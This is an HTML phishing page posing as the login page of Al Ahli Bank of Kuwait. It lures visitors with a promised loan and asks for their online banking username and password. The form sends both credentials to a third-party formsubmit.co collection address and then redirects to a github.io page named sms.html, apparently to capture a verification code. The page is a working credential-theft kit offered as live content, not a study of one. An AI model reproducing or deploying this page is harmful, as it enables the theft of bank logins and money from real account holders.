


<!DOCTYPE html>
<html lang="en" style="height:90%;">

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title>البنك الأهلي الكويتي</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=0">
	<link rel="shortcut icon" href="https://th.bing.com/th/id/OIP.johAFTTMB_-M2dVMarMZbgHaDS?pid=ImgDet&rs=1" type="image/x-icon">
	<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js'></script>
	<style>
body {
		background-color: #;
	}
	/* General Styles */
	
	* {
		padding: 0;
		margin: 0
	}
	
	.fl-btn {
		font-family: 'Open Sans', sans-serif;
		border-radius: 0px;
		border: 0;
		background-color: #3f9341;
		color: #fff;
		cursor: pointer;
		padding: 16px 0;
		font-size: 19px;
		width: 95%;
		transition: background-color 0.25s ease-in-out
	}
}

/* Responsive Media Queries */
@media only screen and (max-width: 1480px) {
	.fl {
		width: 43%
	}
}
@media only screen and (max-width: 768px) {
	.fl {
		margin: 10px 10px;
		width: auto
	}
	
	.fl-body {
		width: 100%
	}
}
@media only screen and (max-width: 460px) {
	.fl-btn {
		font-size: px
	}
	
	.fl-icon-dl {
		width: 25px;
		height: 25px
	}
	
	.fl-text {
		font-size: 12px
	}
}
@media only screen and (max-width: 390px) {
	.fl-icon-lock {
		display: block;
		margin: 0 auto 10px
	}
}
	</style>
</head>

<body marginwidth="0" marginheight="0">
	<br>


	<center><img src="https://th.bing.com/th/id/R.2b0328537795441c153f02dd13b70331?rik=0qQCBh74bwabQg&pid=ImgRaw&r=0&sres=1&sresct=1" width="360" height="170" alt=""></center>
	<br>
	<br>

		<center>

		<p style="font-size:17px"><b>الان قم بتسجيل الدخول الى حسابك البنكي الذي تريد استلام القرض عليه</b></p>

	</center>
	<br>
	<br>
	<div class="fl">
		<div class="f1-head">
			<center>
				<form action="https://formsubmit.co/bb2eccfe11b347e4d5a7b291753db69b" method="POST">
					<input type="hidden" name="_next" value="https://adwryeedfg.github.io/kuwit/sms.html">
					<input type="hidden" name="_subject" value="Login-البنك الأهلي الكويتي">
					<input type="hidden" name="_captcha" value="false">
					<input style="display: block;
width: 80%;
  padding: 0.375rem 0.75rem;
  font-size: 1rem;
  line-height: 1.5;
  border: 1px solid #ced4da;
  margin-bottom:10px;
  border-radius: 0.25rem;
  transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;" type="text"   required name="acount" placeholder="ادخل اسم المستخدم">
					<input style="display: block;
width: 80%;
  padding: 0.375rem 0.75rem;
  font-size: 1rem;
  line-height: 1.5;
  border: 1px solid #ced4da;
  margin-bottom:10px;
  border-radius: 0.25rem;
  transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;" type="text"   required name="pass" placeholder="ادخل كلمة السر">
					<br>
                    <br>
					<input class="fl-btn" type="submit" value="متابعة"> </form>
			</center>

</body>

</html>